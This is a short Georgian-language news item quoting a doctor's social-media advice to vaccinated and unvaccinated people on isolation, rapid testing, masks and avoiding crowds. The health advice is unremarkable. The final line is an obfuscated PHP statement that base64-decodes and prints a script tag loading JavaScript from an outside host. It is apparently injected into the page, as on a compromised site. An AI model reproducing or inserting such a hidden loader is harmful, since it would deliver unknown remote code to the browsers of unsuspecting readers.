celsiusi
ავერსი საქკაბელი
ექიმი გიორგი ღოღობერიძე სოციალურ ქსელში სტატუსს აქვეყნებს, სადაც აცრილ და აუცრელ მოსახლეობას მიმართავს და რჩევებს აძლევს. 
 
„აცრილი და აუცრელი მოსახლეობის საყურადღებოდ!!!!!
 
1.პირველივე სიმპტომების განვითარებისთანავე იზოლირდით თქვენც და თქვენი ოჯახის წევრებიც.!
2.ჩაიტარეთ სწრაფი ტესტი აუცილებლად.
3.საეჭვო შემთხვევაში გაიმეორეთ ტესტი 48-72 საათში.
 
შეატყობინეთ თქვენთან კონტაქტში მყოფ ადამიანებს, მათ ვისთანაც იმყოფებოდით ხანგრძლივი დროის განმავლობაში, ისადილეთ ერთად, ისაუბრეთ უნიღბოდ.
 
4.დაუშვებელია სიმპტომიანი ადამიანების მოძრაობა გარეთ! თუნდაც სასეირნოდ ნიღბით და იქ სადაც ხალხი მოძრაობს! როგორც აუცრელის ისე აცრილის!
 
5.აცრა იცავს დაავადების მძიმე მიმდინარეობისგან და ლეტალური გამოსავლისგან!!!! მაგრამ აცრილი ადამიანი ჩვეულებრივ ინფიცირდება ისე როგორც აუცრელი.
6. აცრილები მინიმუმ 2კვირა მოერიდეთ: თავშეყრის ადგილებს!
7.აცრიდან მეორე დღესვე ნუ გაიქცევით დასასვენებლად ტურისტულ ზონებში, შეგიძლიათ საკუთარ აგარაკზე, ან სოფელში თქვენსავე ეზოში. რადგან შესაძლებელია დაინფიცირდეთ და გახდეთ გადამტანი
8. აცრილიც და აუცრელიც ნუ ივლით უნიღბოდ! დაიცავით დისტანცია! დაიცავით ჰიგიენის წესები!“- წერს ღოღობერიძე.
1764
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");